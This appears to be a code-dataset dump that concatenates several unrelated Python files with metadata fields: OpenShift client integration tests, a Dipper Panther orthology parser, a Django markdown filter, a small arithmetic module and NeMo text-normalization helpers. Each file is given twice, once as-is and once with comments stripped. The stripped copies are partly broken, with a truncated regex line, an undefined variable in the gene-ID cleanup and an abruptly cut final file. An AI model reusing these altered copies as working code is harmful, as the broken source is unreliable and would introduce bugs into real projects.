    """Verify that `oc get pods` returns output."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    assert client.get_pods()
def test_get_prom_token():
    """Log in and verify a Prometheus token can be fetched from the cluster."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    assert client.get_prom_token()
def test_is_cnv_installed():
    """Log in and verify the CNV operator is installed."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    assert client.is_cnv_installed()
def test_is_kata_installed():
    """Log in and verify the sandboxed-containers (kata) operator is installed."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    assert client.is_kata_installed()
def test_is_ocs_installed():
    """Log in and verify the OCS operator is installed."""
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    assert client.is_ocs_installed()
def test_is_kata_installed():
    """
    This method check if kata operator is installed
    :return:
    """
    # NOTE(review): duplicate definition — this shadows the identical
    # test_is_kata_installed defined earlier in this file, so pytest only
    # collects this one (ruff/flake8 F811). One of the two copies should be
    # removed or renamed.
    oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    oc.login()
    assert oc.is_kata_installed()
def test_oc_exec():
    """Verify `oc exec` runs a command inside a pod and returns its output."""
    expected = "I am here"
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    # Echo a known marker inside the Prometheus container and compare.
    echoed = client.exec(pod_name="prometheus-k8s-0", namespace="openshift-monitoring", container='prometheus', command=f'echo "{expected}"')
    assert echoed == expected
def test_collect_prometheus():
    """Verify a Prometheus snapshot can be collected and is a valid tarball.

    TBD: validate the snapshot's contents, not just the archive format.
    """
    client = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
    client.login()
    with tempfile.TemporaryDirectory() as artifacts_dir:
        snap = PrometheusSnapshot(oc=client, artifacts_path=artifacts_dir, verbose=True)
        snap.prepare_for_snapshot(pre_wait_time=1)
        # Give Prometheus a moment to accumulate data before snapshotting.
        time.sleep(10)
        archive = snap.retrieve_snapshot(post_wait_time=1)
        assert tarfile.is_tarfile(archive)
| 26.060976
| 141
| 0.704024
|
from benchmark_runner.common.oc.oc import OC
from tests.integration.benchmark_runner.test_environment_variables import *
import tempfile
import tarfile
import time
from benchmark_runner.common.prometheus.prometheus_snapshot import PrometheusSnapshot
def test_oc_get_ocp_server_version():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_ocp_server_version()
def test_oc_get_kata_version():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_kata_version()
def test_oc_get_cnv_version():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_cnv_version()
def test_oc_get_ocs_version():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_ocs_version()
def test_oc_get_master_nodes():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_master_nodes()
def test_login():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
assert oc.login()
def test_oc_get_pod_name():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
assert oc._get_pod_name(pod_name='erererer', namespace=test_environment_variable['namespace']) == ''
def test_oc_get_pods():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
assert oc.get_pods()
def test_get_prom_token():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.get_prom_token()
def test_is_cnv_installed():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_cnv_installed()
def test_is_kata_installed():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_kata_installed()
def test_is_ocs_installed():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_ocs_installed()
def test_is_kata_installed():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
assert oc.is_kata_installed()
def test_oc_exec():
test_message = "I am here"
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
answer = oc.exec(pod_name="prometheus-k8s-0", namespace="openshift-monitoring", container='prometheus', command=f'echo "{test_message}"')
assert answer == test_message
def test_collect_prometheus():
oc = OC(kubeadmin_password=test_environment_variable['kubeadmin_password'])
oc.login()
with tempfile.TemporaryDirectory() as dirname:
snapshot = PrometheusSnapshot(oc=oc, artifacts_path=dirname, verbose=True)
snapshot.prepare_for_snapshot(pre_wait_time=1)
time.sleep(10)
tarball = snapshot.retrieve_snapshot(post_wait_time=1)
assert tarfile.is_tarfile(tarball)
| true
| true
|
790c95ac63865502589c094f74b76d70fd67aee3
| 15,667
|
py
|
Python
|
dipper/sources/Panther.py
|
putmantime/dipper
|
583d76207877096a84a98a379c904ea9c960c400
|
[
"BSD-3-Clause"
] | null | null | null |
dipper/sources/Panther.py
|
putmantime/dipper
|
583d76207877096a84a98a379c904ea9c960c400
|
[
"BSD-3-Clause"
] | null | null | null |
dipper/sources/Panther.py
|
putmantime/dipper
|
583d76207877096a84a98a379c904ea9c960c400
|
[
"BSD-3-Clause"
] | 1
|
2022-01-04T14:34:33.000Z
|
2022-01-04T14:34:33.000Z
|
import tarfile
import re
import logging
from dipper.sources.Source import Source
from dipper.models.assoc.OrthologyAssoc import OrthologyAssoc
from dipper.models.Model import Model
from dipper.models.Dataset import Dataset
from dipper import config
from dipper import curie_map
__author__ = 'nicole'
logger = logging.getLogger(__name__)
class Panther(Source):
"""
The pairwise orthology calls from Panther DB:
http://pantherdb.org/ encompass 22 species,
from the RefGenome and HCOP projects.
Here, we map the orthology classes to RO homology relationships
This resource may be extended in the future with additional species.
This currently makes a graph of orthologous relationships between genes,
with the assumption that gene metadata (labels, equivalent ids) are
provided from other sources.
Gene families are nominally created from the orthology files,
though these are incomplete with no hierarchical (subfamily) information.
This will get updated from the HMM files in the future.
Note that there is a fair amount of identifier cleanup performed to align
with our standard CURIE prefixes.
The test graph of data is output based on configured
"protein" identifiers in conf.json.
By default, this will produce a file with ALL orthologous relationships.
IF YOU WANT ONLY A SUBSET, YOU NEED TO PROVIDE A FILTER UPON CALLING THIS
WITH THE TAXON IDS
"""
PNTHDL = 'ftp://ftp.pantherdb.org/ortholog/current_release'
files = {
'refgenome': {
'file': 'RefGenomeOrthologs.tar.gz',
'url': PNTHDL+'/RefGenomeOrthologs.tar.gz'},
'hcop': {
'file': 'Orthologs_HCOP.tar.gz',
'url': PNTHDL+'/Orthologs_HCOP.tar.gz'}
}
def __init__(self, graph_type, are_bnodes_skolemized, tax_ids=None):
super().__init__(graph_type, are_bnodes_skolemized, 'panther')
self.tax_ids = tax_ids
self.dataset = Dataset(
'panther', 'Protein ANalysis THrough Evolutionary Relationships',
'http://pantherdb.org/', None,
'http://www.pantherdb.org/terms/disclaimer.jsp')
# # Defaults
# if self.tax_ids is None:
# self.tax_ids = [9606, 10090, 7955]
if 'test_ids' not in config.get_config() \
or 'protein' not in config.get_config()['test_ids']:
logger.warning("not configured with gene test ids.")
else:
self.test_ids = config.get_config()['test_ids']['protein']
return
def fetch(self, is_dl_forced=False):
"""
:return: None
"""
self.get_files(is_dl_forced)
# TODO the version number is tricky to get
# we can't get it from redirects of the url
# TODO use the remote timestamp of the file?
return
def parse(self, limit=None):
"""
:return: None
"""
if self.testOnly:
self.testMode = True
if self.tax_ids is None:
logger.info(
"No taxon filter set; Dumping all orthologous associations.")
else:
logger.info(
"Only the following taxa will be dumped: %s",
str(self.tax_ids))
self._get_orthologs(limit)
return
def _get_orthologs(self, limit):
"""
This will process each of the specified pairwise orthology files,
creating orthology associations based on the specified orthology code.
this currently assumes that each of the orthology files is identically
formatted. Relationships are made between genes here.
There is also a nominal amount of identifier re-formatting:
MGI:MGI --> MGI
Ensembl --> ENSEMBL
we skip any genes where we don't know how to map the gene identifiers.
For example, Gene:Huwe1 for RAT is not an identifier, so we skip any
mappings to this identifier. Often, the there are two entries for the
same gene (base on equivalent Uniprot id), and so we are not actually
losing any information.
We presently have a hard-coded filter to select only orthology
relationships where one of the pair is in our species of interest
(Mouse and Human, for the moment).
This will be added as a configurable parameter in the future.
Genes are also added to a grouping class defined with a PANTHER id.
Triples:
<gene1_id> RO:othologous <gene2_id>
<assoc_id> :hasSubject <gene1_id>
<assoc_id> :hasObject <gene2_id>
<assoc_id> :hasPredicate <RO:orthologous>
<assoc_id> dc:evidence ECO:phylogenetic_evidence
<panther_id> a DATA:gene_family
<panther_id> RO:has_member <gene1_id>
<panther_id> RO:has_member <gene2_id>
:param limit:
:return:
"""
logger.info("getting orthologs")
if self.testMode:
g = self.testgraph
else:
g = self.graph
model = Model(g)
unprocessed_gene_ids = set()
for k in self.files.keys():
f = '/'.join((self.rawdir, self.files[k]['file']))
matchcounter = 0
mytar = tarfile.open(f, 'r:gz')
# assume that the first entry is the item
fname = mytar.getmembers()[0]
logger.info("Parsing %s", fname.name)
line_counter = 0
with mytar.extractfile(fname) as csvfile:
for line in csvfile:
# skip comment lines
if re.match(r'^#', line.decode()):
logger.info("Skipping header line")
continue
line_counter += 1
# a little feedback to the user since there's so many
if line_counter % 1000000 == 0:
logger.info(
"Processed %d lines from %s",
line_counter, fname.name)
line = line.decode().strip()
# parse each row. ancestor_taxon is unused
# HUMAN|Ensembl=ENSG00000184730|UniProtKB=Q0VD83
# MOUSE|MGI=MGI=2176230|UniProtKB=Q8VBT6
# LDO Euarchontoglires PTHR15964
(a, b, orthology_class, ancestor_taxon,
panther_id) = line.split('\t')
(species_a, gene_a, protein_a) = a.split('|')
(species_b, gene_b, protein_b) = b.split('|')
# skip the entries that don't have homolog relationships
# with the test ids
if self.testMode and not (
re.sub(r'UniProtKB=', '',
protein_a) in self.test_ids or
re.sub(r'UniProtKB=', '', protein_b)
in self.test_ids):
continue
# map the taxon abbreviations to ncbi taxon ids
taxon_a = self._map_taxon_abbr_to_id(species_a)
taxon_b = self._map_taxon_abbr_to_id(species_b)
# ###uncomment the following code block
# if you want to filter based on taxid of favorite animals
# taxids = [9606,10090,10116,7227,7955,6239,8355]
# taxids = [9606] #human only
# retain only those orthologous relationships to genes
# in the specified taxids
# using AND will get you only those associations where
# gene1 AND gene2 are in the taxid list (most-filter)
# using OR will get you any associations where
# gene1 OR gene2 are in the taxid list (some-filter)
if (
self.tax_ids is not None and
(int(re.sub(r'NCBITaxon:', '', taxon_a.rstrip()))
not in self.tax_ids) and
(int(re.sub(
r'NCBITaxon:', '', taxon_b.rstrip())) not in
self.tax_ids)):
continue
else:
matchcounter += 1
if limit is not None and matchcounter > limit:
break
# ### end code block for filtering on taxon
# fix the gene identifiers
gene_a = re.sub(r'=', ':', gene_a)
gene_b = re.sub(r'=', ':', gene_b)
clean_gene = self._clean_up_gene_id(gene_a, species_a)
if clean_gene is None:
unprocessed_gene_ids.add(gene_a)
gene_a = clean_gene
clean_gene = self._clean_up_gene_id(gene_b, species_b)
if clean_gene is None:
unprocessed_gene_ids.add(gene_b)
gene_b = clean_gene
# a special case here; mostly some rat genes
# they use symbols instead of identifiers. will skip
if gene_a is None or gene_b is None:
continue
rel = self._map_orthology_code_to_RO(orthology_class)
evidence_id = 'ECO:0000080' # phylogenetic evidence
# add the association and relevant nodes to graph
assoc = OrthologyAssoc(g, self.name, gene_a, gene_b, rel)
assoc.add_evidence(evidence_id)
# add genes to graph;
# assume labels will be taken care of elsewhere
model.addClassToGraph(gene_a, None)
model.addClassToGraph(gene_b, None)
# might as well add the taxon info for completeness
g.addTriple(
gene_a, model.object_properties['in_taxon'], taxon_a)
g.addTriple(
gene_b, model.object_properties['in_taxon'], taxon_b)
assoc.add_association_to_graph()
# note this is incomplete...
# it won't construct the full family hierarchy,
# just the top-grouping
assoc.add_gene_family_to_graph(
':'.join(('PANTHER', panther_id)))
if not self.testMode \
and limit is not None and line_counter > limit:
break
logger.info("finished processing %s", f)
logger.warning(
"The following gene ids were unable to be processed: %s",
str(unprocessed_gene_ids))
return
@staticmethod
def _map_taxon_abbr_to_id(ptax):
"""
Will map the panther-specific taxon abbreviations to NCBI taxon numbers
:param ptax:
:return: NCBITaxon id
"""
taxid = None
ptax_to_taxid_map = {
'ANOCA': 28377, # green lizard
'ARATH': 3702, # arabadopsis
'BOVIN': 9913, # cow
'CAEEL': 6239, # worm
'CANFA': 9615, # dog
'CHICK': 9031, # chicken
'DANRE': 7955, # zebrafish
'DICDI': 44689, # discodium
'DROME': 7227, # drosophila melanogaster
'ECOLI': 562,
'HORSE': 9796, # horses
'HUMAN': 9606, # humans
'MACMU': 9544, # macaque
'MONDO': 13616, # opossum
'MOUSE': 10090, # mouse
'ORNAN': 9258, # orangutan
'PANTR': 9598, # chimp
'PIG': 9823,
'RAT': 10116,
'SCHPO': 4896, # pombe yeast
'TAKRU': 31033, # pufferfish
'XENTR': 8364, # xenopus
'YEAST': 4932, # yeast
}
if ptax in ptax_to_taxid_map:
taxid = ':'.join(('NCBITaxon', str(ptax_to_taxid_map.get(ptax))))
else:
logger.error("unmapped taxon code %s", ptax)
return taxid
@staticmethod
def _map_orthology_code_to_RO(ortho):
"""
Map the panther-specific orthology code (P,O,LDO,X,LDX)
to relationship-ontology
identifiers.
:param ortho: orthology code
:return: RO identifier
"""
ortho_rel = OrthologyAssoc.ortho_rel
ro_id = ortho_rel['orthologous'] # in orthology relationship with
ortho_to_ro_map = {
'P': ortho_rel['paralogous'],
'O': ortho_rel['orthologous'],
'LDO': ortho_rel['least_diverged_orthologous'],
'X': ortho_rel['xenologous'],
'LDX': ortho_rel['xenologous']
}
if ortho in ortho_to_ro_map:
ro_id = ortho_to_ro_map.get(ortho)
else:
logger.warning(
"unmapped orthology code %s. Defaulting to 'orthology'", ortho)
return ro_id
@staticmethod
def _clean_up_gene_id(geneid, sp):
"""
A series of identifier rewriting to conform with
standard gene identifiers.
:param geneid:
:param sp:
:return:
"""
# special case for MGI
geneid = re.sub(r'MGI:MGI:', 'MGI:', geneid)
# rewrite Ensembl --> ENSEMBL
geneid = re.sub(r'Ensembl', 'ENSEMBL', geneid)
# rewrite Gene:CELE --> WormBase
# these are old-school cosmid identifier
geneid = re.sub(r'Gene:CELE', 'WormBase:', geneid)
if sp == 'CAEEL':
if re.match(r'(Gene|ENSEMBLGenome):\w+\.\d+', geneid):
geneid = re.sub(
r'(?:Gene|ENSEMBLGenome):(\w+\.\d+)',
r'WormBase:\1', geneid)
if sp == 'DROME':
if re.match(r'(ENSEMBLGenome):\w+\.\d+', geneid):
geneid = re.sub(
r'(?:ENSEMBLGenome):(\w+\.\d+)', r'FlyBase:\1', geneid)
# rewrite GeneID --> NCBIGene
geneid = re.sub(r'GeneID', 'NCBIGene', geneid)
# rewrite Gene:Dmel --> FlyBase
geneid = re.sub(r'Gene:Dmel_', 'FlyBase:', geneid)
# rewrite Gene:CG --> FlyBase:CG
geneid = re.sub(r'Gene:CG', 'FlyBase:CG', geneid)
# rewrite ENSEMBLGenome:FBgn --> FlyBase:FBgn
geneid = re.sub(r'ENSEMBLGenome:FBgn', 'FlyBase:FBgn', geneid)
# rewrite Gene:<ensembl ids> --> ENSEMBL:<id>
geneid = re.sub(r'Gene:ENS', 'ENSEMBL:ENS', geneid)
# rewrite Gene:<Xenbase ids> --> Xenbase:<id>
geneid = re.sub(r'Gene:Xenbase:', 'Xenbase:', geneid)
# TODO this would be much better done as
# if foo not in curie_map:
# if re.match(r'(Gene|ENSEMBLGenome):', geneid) or \
# re.match(r'Gene_ORFName', geneid) or \
# re.match(r'Gene_Name', geneid):
# # logger.warning(
# #"Found an identifier I don't know how to fix (species %s): %s",
# # sp, geneid)
pfxlcl = re.split(r':', geneid)
pfx = pfxlcl[0]
if pfx is None or pfx not in curie_map.get():
logger.warning("No curie prefix for (species %s): %s", sp, geneid)
geneid = None
return geneid
def getTestSuite(self):
import unittest
from tests.test_panther import PantherTestCase
test_suite = unittest.TestLoader().loadTestsFromTestCase(
PantherTestCase)
return test_suite
| 37.037825
| 79
| 0.544329
|
import tarfile
import re
import logging
from dipper.sources.Source import Source
from dipper.models.assoc.OrthologyAssoc import OrthologyAssoc
from dipper.models.Model import Model
from dipper.models.Dataset import Dataset
from dipper import config
from dipper import curie_map
__author__ = 'nicole'
logger = logging.getLogger(__name__)
class Panther(Source):
PNTHDL = 'ftp://ftp.pantherdb.org/ortholog/current_release'
files = {
'refgenome': {
'file': 'RefGenomeOrthologs.tar.gz',
'url': PNTHDL+'/RefGenomeOrthologs.tar.gz'},
'hcop': {
'file': 'Orthologs_HCOP.tar.gz',
'url': PNTHDL+'/Orthologs_HCOP.tar.gz'}
}
def __init__(self, graph_type, are_bnodes_skolemized, tax_ids=None):
super().__init__(graph_type, are_bnodes_skolemized, 'panther')
self.tax_ids = tax_ids
self.dataset = Dataset(
'panther', 'Protein ANalysis THrough Evolutionary Relationships',
'http://pantherdb.org/', None,
'http://www.pantherdb.org/terms/disclaimer.jsp')
if 'test_ids' not in config.get_config() \
or 'protein' not in config.get_config()['test_ids']:
logger.warning("not configured with gene test ids.")
else:
self.test_ids = config.get_config()['test_ids']['protein']
return
def fetch(self, is_dl_forced=False):
self.get_files(is_dl_forced)
# TODO use the remote timestamp of the file?
return
def parse(self, limit=None):
if self.testOnly:
self.testMode = True
if self.tax_ids is None:
logger.info(
"No taxon filter set; Dumping all orthologous associations.")
else:
logger.info(
"Only the following taxa will be dumped: %s",
str(self.tax_ids))
self._get_orthologs(limit)
return
def _get_orthologs(self, limit):
logger.info("getting orthologs")
if self.testMode:
g = self.testgraph
else:
g = self.graph
model = Model(g)
unprocessed_gene_ids = set()
for k in self.files.keys():
f = '/'.join((self.rawdir, self.files[k]['file']))
matchcounter = 0
mytar = tarfile.open(f, 'r:gz')
# assume that the first entry is the item
fname = mytar.getmembers()[0]
logger.info("Parsing %s", fname.name)
line_counter = 0
with mytar.extractfile(fname) as csvfile:
for line in csvfile:
# skip comment lines
if re.match(r'^
logger.info("Skipping header line")
continue
line_counter += 1
# a little feedback to the user since there's so many
if line_counter % 1000000 == 0:
logger.info(
"Processed %d lines from %s",
line_counter, fname.name)
line = line.decode().strip()
(a, b, orthology_class, ancestor_taxon,
panther_id) = line.split('\t')
(species_a, gene_a, protein_a) = a.split('|')
(species_b, gene_b, protein_b) = b.split('|')
# with the test ids
if self.testMode and not (
re.sub(r'UniProtKB=', '',
protein_a) in self.test_ids or
re.sub(r'UniProtKB=', '', protein_b)
in self.test_ids):
continue
# map the taxon abbreviations to ncbi taxon ids
taxon_a = self._map_taxon_abbr_to_id(species_a)
taxon_b = self._map_taxon_abbr_to_id(species_b)
# ###uncomment the following code block
# if you want to filter based on taxid of favorite animals
# taxids = [9606,10090,10116,7227,7955,6239,8355]
# taxids = [9606] #human only
# retain only those orthologous relationships to genes
# in the specified taxids
# using AND will get you only those associations where
# gene1 AND gene2 are in the taxid list (most-filter)
# using OR will get you any associations where
# gene1 OR gene2 are in the taxid list (some-filter)
if (
self.tax_ids is not None and
(int(re.sub(r'NCBITaxon:', '', taxon_a.rstrip()))
not in self.tax_ids) and
(int(re.sub(
r'NCBITaxon:', '', taxon_b.rstrip())) not in
self.tax_ids)):
continue
else:
matchcounter += 1
if limit is not None and matchcounter > limit:
break
# ### end code block for filtering on taxon
# fix the gene identifiers
gene_a = re.sub(r'=', ':', gene_a)
gene_b = re.sub(r'=', ':', gene_b)
clean_gene = self._clean_up_gene_id(gene_a, species_a)
if clean_gene is None:
unprocessed_gene_ids.add(gene_a)
gene_a = clean_gene
clean_gene = self._clean_up_gene_id(gene_b, species_b)
if clean_gene is None:
unprocessed_gene_ids.add(gene_b)
gene_b = clean_gene
# a special case here; mostly some rat genes
# they use symbols instead of identifiers. will skip
if gene_a is None or gene_b is None:
continue
rel = self._map_orthology_code_to_RO(orthology_class)
evidence_id = 'ECO:0000080' # phylogenetic evidence
# add the association and relevant nodes to graph
assoc = OrthologyAssoc(g, self.name, gene_a, gene_b, rel)
assoc.add_evidence(evidence_id)
# add genes to graph;
# assume labels will be taken care of elsewhere
model.addClassToGraph(gene_a, None)
model.addClassToGraph(gene_b, None)
# might as well add the taxon info for completeness
g.addTriple(
gene_a, model.object_properties['in_taxon'], taxon_a)
g.addTriple(
gene_b, model.object_properties['in_taxon'], taxon_b)
assoc.add_association_to_graph()
# note this is incomplete...
# it won't construct the full family hierarchy,
assoc.add_gene_family_to_graph(
':'.join(('PANTHER', panther_id)))
if not self.testMode \
and limit is not None and line_counter > limit:
break
logger.info("finished processing %s", f)
logger.warning(
"The following gene ids were unable to be processed: %s",
str(unprocessed_gene_ids))
return
@staticmethod
def _map_taxon_abbr_to_id(ptax):
taxid = None
ptax_to_taxid_map = {
'ANOCA': 28377,
'ARATH': 3702,
'BOVIN': 9913,
'CAEEL': 6239,
'CANFA': 9615,
'CHICK': 9031,
'DANRE': 7955,
'DICDI': 44689,
'DROME': 7227,
'ECOLI': 562,
'HORSE': 9796,
'HUMAN': 9606,
'MACMU': 9544,
'MONDO': 13616,
'MOUSE': 10090,
'ORNAN': 9258,
'PANTR': 9598,
'PIG': 9823,
'RAT': 10116,
'SCHPO': 4896,
'TAKRU': 31033,
'XENTR': 8364,
'YEAST': 4932,
}
if ptax in ptax_to_taxid_map:
taxid = ':'.join(('NCBITaxon', str(ptax_to_taxid_map.get(ptax))))
else:
logger.error("unmapped taxon code %s", ptax)
return taxid
@staticmethod
def _map_orthology_code_to_RO(ortho):
ortho_rel = OrthologyAssoc.ortho_rel
ro_id = ortho_rel['orthologous']
ortho_to_ro_map = {
'P': ortho_rel['paralogous'],
'O': ortho_rel['orthologous'],
'LDO': ortho_rel['least_diverged_orthologous'],
'X': ortho_rel['xenologous'],
'LDX': ortho_rel['xenologous']
}
if ortho in ortho_to_ro_map:
ro_id = ortho_to_ro_map.get(ortho)
else:
logger.warning(
"unmapped orthology code %s. Defaulting to 'orthology'", ortho)
return ro_id
@staticmethod
def _clean_up_gene_id(geneid, sp):
geneid = re.sub(r'MGI:MGI:', 'MGI:', geneid)
geneid = re.sub(r'Ensembl', 'ENSEMBL', geneid)
geneid = re.sub(r'Gene:CELE', 'WormBase:', geneid)
if sp == 'CAEEL':
if re.match(r'(Gene|ENSEMBLGenome):\w+\.\d+', geneid):
geneid = re.sub(
r'(?:Gene|ENSEMBLGenome):(\w+\.\d+)',
r'WormBase:\1', geneid)
if sp == 'DROME':
if re.match(r'(ENSEMBLGenome):\w+\.\d+', geneid):
geneid = re.sub(
r'(?:ENSEMBLGenome):(\w+\.\d+)', r'FlyBase:\1', geneid)
geneid = re.sub(r'GeneID', 'NCBIGene', geneid)
geneid = re.sub(r'Gene:Dmel_', 'FlyBase:', geneid)
geneid = re.sub(r'Gene:CG', 'FlyBase:CG', geneid)
geneid = re.sub(r'ENSEMBLGenome:FBgn', 'FlyBase:FBgn', geneid)
geneid = re.sub(r'Gene:ENS', 'ENSEMBL:ENS', geneid)
geneid = re.sub(r'Gene:Xenbase:', 'Xenbase:', geneid)
pfx = pfxlcl[0]
if pfx is None or pfx not in curie_map.get():
logger.warning("No curie prefix for (species %s): %s", sp, geneid)
geneid = None
return geneid
def getTestSuite(self):
import unittest
from tests.test_panther import PantherTestCase
test_suite = unittest.TestLoader().loadTestsFromTestCase(
PantherTestCase)
return test_suite
| true
| true
|
790c96dd4c7bcfd16d5ba09119835c9e3fc6ce48
| 1,006
|
py
|
Python
|
blog/templatetags/markdown_html.py
|
whitecat-22/blog_site
|
21fae0cabacfa206341ec78deefd681f21f2c291
|
[
"MIT"
] | 1
|
2021-08-19T23:56:38.000Z
|
2021-08-19T23:56:38.000Z
|
blog/templatetags/markdown_html.py
|
whitecat-22/blog_site
|
21fae0cabacfa206341ec78deefd681f21f2c291
|
[
"MIT"
] | null | null | null |
blog/templatetags/markdown_html.py
|
whitecat-22/blog_site
|
21fae0cabacfa206341ec78deefd681f21f2c291
|
[
"MIT"
] | null | null | null |
from django import template
from django.utils.safestring import mark_safe
import markdown
from markdownx.utils import markdownify
from markdownx.settings import (
MARKDOWNX_MARKDOWN_EXTENSIONS,
MARKDOWNX_MARKDOWN_EXTENSION_CONFIGS
)
from markdown.extensions import Extension
register = template.Library()
@register.filter
def markdown_to_html(text):
"""マークダウンをhtmlに変換する。"""
return mark_safe(markdownify(text))
class EscapeHtml(Extension):
def extendMarkdown(self, md):
md.preprocessors.deregister('html_block')
md.inlinePatterns.deregister('html')
@register.filter
def markdown_to_html_with_escape(text):
"""マークダウンをhtmlに変換する。
生のHTMLやCSS、JavaScript等のコードをエスケープした上で、マークダウンをHTMLに変換します。
公開しているコメント欄等には、こちらを使ってください。
"""
extensions = MARKDOWNX_MARKDOWN_EXTENSIONS + [EscapeHtml()]
html = markdown.markdown(
text, extensions=extensions,
extension_configs=MARKDOWNX_MARKDOWN_EXTENSION_CONFIGS
)
return mark_safe(html)
| 25.15
| 63
| 0.762425
|
from django import template
from django.utils.safestring import mark_safe
import markdown
from markdownx.utils import markdownify
from markdownx.settings import (
MARKDOWNX_MARKDOWN_EXTENSIONS,
MARKDOWNX_MARKDOWN_EXTENSION_CONFIGS
)
from markdown.extensions import Extension
register = template.Library()
@register.filter
def markdown_to_html(text):
return mark_safe(markdownify(text))
class EscapeHtml(Extension):
def extendMarkdown(self, md):
md.preprocessors.deregister('html_block')
md.inlinePatterns.deregister('html')
@register.filter
def markdown_to_html_with_escape(text):
extensions = MARKDOWNX_MARKDOWN_EXTENSIONS + [EscapeHtml()]
html = markdown.markdown(
text, extensions=extensions,
extension_configs=MARKDOWNX_MARKDOWN_EXTENSION_CONFIGS
)
return mark_safe(html)
| true
| true
|
790c97fefa96c656310b481d8467d21f9c7aefe6
| 279
|
py
|
Python
|
unittest/code.py
|
MahanBi/python-tests
|
b7d8b8a1b6176bd991bd81fdc357203abc6c5288
|
[
"Apache-2.0"
] | null | null | null |
unittest/code.py
|
MahanBi/python-tests
|
b7d8b8a1b6176bd991bd81fdc357203abc6c5288
|
[
"Apache-2.0"
] | null | null | null |
unittest/code.py
|
MahanBi/python-tests
|
b7d8b8a1b6176bd991bd81fdc357203abc6c5288
|
[
"Apache-2.0"
] | null | null | null |
def add(a: int, b: int) -> int:
return a + b
def subtract(a: int, b: int) -> int:
return a - b
def multiply(a: int, b: int or str) -> int:
return a * b
"""
...
----------------------------------------------------------------------
Ran 3 tests in 0.000s
OK
"""
| 13.95
| 70
| 0.387097
|
def add(a: int, b: int) -> int:
return a + b
def subtract(a: int, b: int) -> int:
return a - b
def multiply(a: int, b: int or str) -> int:
return a * b
| true
| true
|
790c981f4cc854524f7a2a7c9050b86f4e6f0725
| 2,453
|
py
|
Python
|
nemo/collections/nlp/data/text_normalization/utils.py
|
JMichaelStringer/NeMo
|
b5b29a69ccb0ec3d8c9ace2f33872ee99858a559
|
[
"Apache-2.0"
] | 1
|
2021-09-10T10:40:51.000Z
|
2021-09-10T10:40:51.000Z
|
nemo/collections/nlp/data/text_normalization/utils.py
|
JMichaelStringer/NeMo
|
b5b29a69ccb0ec3d8c9ace2f33872ee99858a559
|
[
"Apache-2.0"
] | null | null | null |
nemo/collections/nlp/data/text_normalization/utils.py
|
JMichaelStringer/NeMo
|
b5b29a69ccb0ec3d8c9ace2f33872ee99858a559
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
from copy import deepcopy
from nltk import word_tokenize
from tqdm import tqdm
import nemo.collections.nlp.data.text_normalization.constants as constants
__all__ = ['read_data_file', 'normalize_str']
def read_data_file(fp):
""" Reading the raw data from a file of NeMo format
For more info about the data format, refer to the
`text_normalization doc <https://github.com/NVIDIA/NeMo/blob/main/docs/source/nlp/text_normalization.rst>`.
"""
insts, w_words, s_words, classes = [], [], [], []
# Read input file
with open(fp, 'r', encoding='utf-8') as f:
for line in tqdm(f):
es = [e.strip() for e in line.strip().split('\t')]
if es[0] == '<eos>':
inst = (deepcopy(classes), deepcopy(w_words), deepcopy(s_words))
insts.append(inst)
# Reset
w_words, s_words, classes = [], [], []
else:
classes.append(es[0])
w_words.append(es[1])
s_words.append(es[2])
return insts
def normalize_str(input_str, lang):
""" Normalize an input string """
input_str_tokens = basic_tokenize(input_str.strip().lower(), lang)
input_str = ' '.join(input_str_tokens)
input_str = input_str.replace(' ', ' ')
return input_str
def remove_puncts(input_str):
""" Remove punctuations from an input string """
return input_str.translate(str.maketrans('', '', string.punctuation))
def basic_tokenize(input_str, lang):
"""
The function is used to do some basic tokenization
Args:
input_str: The input string
lang: Language of the input string
Return: a list of tokens of the input string
"""
if lang == constants.ENGLISH:
return word_tokenize(input_str)
return input_str.strip().split(' ')
| 34.069444
| 111
| 0.6596
|
import string
from copy import deepcopy
from nltk import word_tokenize
from tqdm import tqdm
import nemo.collections.nlp.data.text_normalization.constants as constants
__all__ = ['read_data_file', 'normalize_str']
def read_data_file(fp):
insts, w_words, s_words, classes = [], [], [], []
with open(fp, 'r', encoding='utf-8') as f:
for line in tqdm(f):
es = [e.strip() for e in line.strip().split('\t')]
if es[0] == '<eos>':
inst = (deepcopy(classes), deepcopy(w_words), deepcopy(s_words))
insts.append(inst)
w_words, s_words, classes = [], [], []
else:
classes.append(es[0])
w_words.append(es[1])
s_words.append(es[2])
return insts
